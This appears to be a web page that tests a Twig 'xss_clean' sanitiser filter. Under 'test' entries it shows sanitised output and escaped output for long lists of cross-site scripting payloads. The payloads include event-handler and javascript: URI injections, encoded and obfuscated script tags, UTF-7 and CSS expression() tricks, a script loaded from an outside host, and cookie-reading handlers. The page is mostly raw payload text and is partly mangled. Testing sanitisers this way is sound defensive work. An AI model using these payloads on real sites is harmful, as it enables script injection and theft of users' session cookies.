onerror=alert(487)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(488)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(489)" onclick="alert(490)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(491)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:10:28

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    XXX <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&alert&A7&(378)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi"> X 1 1 1 XXX <xml id=(492)s" src="%(htc)s"></xml>
    x
    <xml:namespace prefix="t"> <>%( > < > <><FRAME SRC="alert(392);"></FRAMESET> <BODY > <BODY > <BODY !#$%%&()*~+-_.,:;?@[/|\]^`=alert(396)> <BGSOUND SRC="alert(401);">
    <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="alert(403);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <STYLE>li {list-style-image: url("alert(404)");}</STYLE><UL>
  • XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=alert(405);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert(406);"> <IFRAME SRC="alert(407);"></IFRAME>
    < > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert(416)")}</STYLE> <!--[if gte IE 4]> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=alert(419)></OBJECT> <HTML xmlns:xss><?import namespace=(493)s" implementation="%(htc)s">XSS</HTML>""","XML namespace."),("""<XML ID=(494)s"><I><IMG SRC="javas<!-- -->cript:alert(420)"></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"></BODY></HTML> <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> <form id="test" /><button >X <body ><br>






































    <input autofocus>

    <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import alert(425);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&& </style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(429);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=alert(430);></embed> <embed src=%(jscript)s></embed> <frameset ></frameset> <object > <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><![CDATA[]]</xml> < href="">test1 test1 <embed width=500 height=500 code="data:text/html,"></embed> <iframe srcdoc="<iframe/srcdoc=>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >'> '';!--"= < > < > < > < > xxs link xxs link <"""><> > < > < > < > < > < > < > < src=""> perl -e 'print "";' > src=""> <

    result with twig: {{ xss.xss | escape }}:

    <x style="background:url('x&#1;;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(374)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(375))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(376)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(377)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(378)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">¼script¾javascript:alert(379)¼/script¾ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(380)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(381)&gt;`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(382)&gt;> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(383) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(384)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id=(492)s" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(385)"> <a href="javascript:javascript:alert(386)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(387)&gt;"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(388)</script> <IMG SRC="javascript:javascript:alert(389);"> <IMG SRC=javascript:javascript:alert(390)> <IMG SRC=`javascript:javascript:alert(391)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(392);"></FRAMESET> <BODY ONLOAD=javascript:alert(393)> <BODY ONLOAD=javascript:javascript:alert(394)> <IMG SRC="jav ascript:javascript:alert(395);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(396)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(397)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(398);"> <IMG DYNSRC="javascript:javascript:alert(399)"> <IMG LOWSRC="javascript:javascript:alert(400)"> <BGSOUND SRC="javascript:javascript:alert(401);"> <BR SIZE="&{javascript:alert(402)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(403);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(404)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(405);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(406);"> <IFRAME SRC="javascript:javascript:alert(407);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(408)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(409)"> <DIV STYLE="background-image: url(javascript:javascript:alert(410))"> <DIV STYLE="width:expression(javascript:alert(411));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(412))"> <XSS STYLE="xss:expression(javascript:alert(413))"> <STYLE TYPE="text/javascript">javascript:alert(414);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(415)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(416)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(417);</SCRIPT><![endif]--> <BASE HREF="javascript:javascript:alert(418);//"> <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(419)></OBJECT> <HTML xmlns:xss><?import namespace=(493)s" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID=(494)s"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(420)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(421)&lt;/SCRIPT&gt;"></BODY></HTML> <SCRIPT SRC="%(jpg)s"></SCRIPT> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- <form id="test" /><button form="test" formaction="javascript:javascript:alert(422)">X <body onscroll=javascript:alert(423)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(424)"> <STYLE>@import'%(css)s';</STYLE> <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(425);');}</STYLE> <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(426)&&;&&<&&/script&&> <SCRIPT onreadystatechange=javascript:javascript:alert(427);></SCRIPT> <style onreadystatechange=javascript:javascript:alert(428);></style> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(429);</html:script></html:html> <embed code=%(scriptlet)s></embed> <embed code=javascript:javascript:alert(430);></embed> <embed src=%(jscript)s></embed> <frameset onload=javascript:javascript:alert(431)></frameset> <object onerror=javascript:javascript:alert(432)> <embed type="image" src=%(scriptlet)s></embed> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(433);">]]</C><X></xml> <IMG SRC=&{javascript:alert(434);};> <a href="jav&#65ascript:javascript:alert(435)">test1</a> <a href="jav&#97ascript:javascript:alert(436)">test1</a> <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> <iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(437)&amp;gt;>"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert((504)S');"> <IMG SRC=javascript:alert((505)S')> <IMG SRC=JaVaScRiPt:alert((506)S')> <IMG SRC=javascript:alert((495)S")> <IMG SRC=`javascript:alert("RSnake says, (507)S'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert((496)S")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert((508)S');"> <IMG SRC="jav&#x09;ascript:alert((509)S');"> <IMG SRC="jav&#x0A;ascript:alert((510)S');"> <IMG SRC="jav&#x0D;ascript:alert((511)S');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC=" &#14; javascript:alert((512)S');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert((497)S")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert((498)S");//<</SCRIPT>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:09:50

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    alert(0); alert(2); alert(4); alert(6);<\x3Cscript>alert(7)<\x00script>alert(8) <audio ></audio> <video ></video> <body src=1 href=1 ></body> <object src=1 href=1 ></object> </svg > <title title ></title > <iframe iframe ></iframe > <body body ></body > <body body ></body > <frameset frameset ></frameset > <html html ></html > <body body ></body > <svg svg ></svg > <body body ></body > <body body ></body > <body body ></body > <body body ></body > <bgsound bgsound ></bgsound > <html html ></html > <html html ></html > <style style ></style > <iframe iframe ></iframe > <body body ></body > <style style ></style > <frameset frameset ></frameset > <applet applet ></applet > <html html ></html > <html html ></html > <body body ></body > <html html ></html > <xml xml ></xml > <frameset frameset ></frameset > <applet applet ></applet > <svg svg ></svg > <html html ></html > <body body ></body > <body body ></body > <object object ></object > <body body ></body > <html html ></html > <applet applet ></applet > <body body ></body > <svg svg ></svg > <applet applet ></applet > <body body ></body > <body body ></body > <iframe iframe ></iframe > <body body ></body > <html html ></html > <object onbeforeload object ></object onbeforeload> <body body ></body > <body body ></body > <body body ></body > <iframe onbeforeload iframe ></iframe onbeforeload> <iframe src iframe src="alert(70)"></iframe src> <svg svg ></svg > <html html ></html > <body body ></body > \x3Cscript>alert(74) alert(77) --&> < > --&> < > --&> < > --&"'> < href="" id="fuzzelement1">test "'`>

    <svg></p> test test test test test test test test test test test test test test <style></style\x3E</style> <style></style\x0D</style> <style></style\x09</style> <style></style\x20</style> <style></style\x0A</style> "'`>ABC

    DEF "'`>ABC
    DEF '`"><\x3Cscript>alert(114)<\x00script>alert(115)<\x3Cimg src=xxx:x > "'`><\x00img src=xxx:x > @import "data:,*%7bx:alert(368))%7D";</style> XXXXXX <style>*[{}@import'%(css)s?]</style>X
    XXX
    XXX <style>*{x:expression(alert(372))}</style>
    X
    X
    X
    X
    XXX
    <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

    result with twig: {{ xss.xss | escape }}:

    <script\x20type="text/javascript">javascript:alert(0);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(2);</script> <script\x09type="text/javascript">javascript:alert(3);</script> <script\x0Ctype="text/javascript">javascript:alert(4);</script> <script\x2Ftype="text/javascript">javascript:alert(5);</script> <script\x0Atype="text/javascript">javascript:alert(6);</script> '`"><\x3Cscript>javascript:alert(7)</script> '`"><\x00script>javascript:alert(8)</script> <img src=1 href=1 onerror="javascript:alert(9)"></img> <audio src=1 href=1 onerror="javascript:alert(10)"></audio> <video src=1 href=1 onerror="javascript:alert(11)"></video> <body src=1 href=1 onerror="javascript:alert(12)"></body> <image src=1 href=1 onerror="javascript:alert(13)"></image> <object src=1 href=1 onerror="javascript:alert(14)"></object> <script src=1 href=1 onerror="javascript:alert(15)"></script> <svg onResize svg onResize="javascript:javascript:alert(16)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(17)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(18)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(19)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(20)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(21)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(22)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(23)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(24)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(25)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(26)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(27)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(28)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(29)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(30)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(31)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(32)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(33)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(34)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(35)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(36)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(37)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(38)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(39)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(40)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(41)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(42)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(43)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(44)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(45)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(46)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(47)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(48)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(49)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(50)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(51)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(52)"></body onResize> <object onError object onError="javascript:javascript:alert(53)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(54)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(55)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(56)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(57)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(58)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(59)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(60)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(61)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(62)"></iframe onload> <body onload body onload="javascript:javascript:alert(63)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(64)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(65)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(66)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(67)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(68)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(69)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(70)"></iframe src> <svg onload svg onload="javascript:javascript:alert(71)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(72)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(73)"></body onblur> \x3Cscript>javascript:alert(74)</script> '"`><script>/* *\x2Fjavascript:alert(75)// */</script> <script>javascript:alert(76)</script\x0D <script>javascript:alert(77)</script\x0A <script>javascript:alert(78)</script\x0B <script charset="\x22>javascript:alert(79)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(80)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(81)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(82)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(83)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(84)> --> `"'><img src='#\x27 onerror=javascript:alert(85)> <a href="javascript\x3Ajavascript:alert(86)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(87)//';</script></p> <a href="javas\x00cript:javascript:alert(88)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(89)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(90)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(91)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(92)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(93)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(94)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(95)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(96)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(97)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(98)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(99)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(100)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(101)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(102)// */</script> <script>/* *\x00/javascript:alert(103)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(104)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(105)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(106)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(107)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(108)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(109);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(110);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(111);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(112);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(113);}</script> '`"><\x3Cscript>javascript:alert(114)</script> '`"><\x00script>javascript:alert(115)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(116)> "'`><\x00img src=xxx:x onerror=javascript:alert(117)> <script src="data:text/plain\x2Cjavascript:alert(118)"></script> <script src="data:\xD4\x8F,javascript:alert(119)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(120)"></script> <script src="data:\xCB\x8F,javascript:alert(121)"></script> <script\x20type="text/javascript">javascript:alert(122);</script> <script\x3Etype="text/javascript">javascript:alert(123);</script> <script\x0Dtype="text/javascript">javascript:alert(124);</script> <script\x09type="text/javascript">javascript:alert(125);</script> <script\x0Ctype="text/javascript">javascript:alert(126);</script> <script\x2Ftype="text/javascript">javascript:alert(127);</script> <script\x0Atype="text/javascript">javascript:alert(128);</script> ABC<div style="x\x3Aexpression(javascript:alert(129)">DEF ABC<div style="x:expression\x5C(javascript:alert(130)">DEF ABC<div style="x:expression\x00(javascript:alert(131)">DEF ABC<div style="x:exp\x00ression(javascript:alert(132)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(133)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(134)">DEF ABC<div style="x:\x09expression(javascript:alert(135)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(136)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(137)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(138)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(139)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(140)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(141)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(142)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(143)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(144)">DEF ABC<div style="x:\x20expression(javascript:alert(145)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(146)">DEF ABC<div style="x:\x00expression(javascript:alert(147)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(148)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(149)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(150)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(151)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(152)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(153)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(154)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(155)">DEF <a href="\x0Bjavascript:javascript:alert(156)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(157)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(158)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(159)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(160)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(161)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(162)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(163)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(164)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(165)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(166)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(167)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(168)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(169)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(170)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(171)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(172)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(173)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(174)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(175)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(176)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(177)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(178)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(179)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(180)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(181)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(182)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(183)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(184)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(185)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(186)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(187)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(188)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(189)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(190)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(191)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(192)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(193)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(194)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(195)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(196)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(197)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(198)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(199)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(200)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(201)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(202)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(203)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(204)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(205)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(206)" 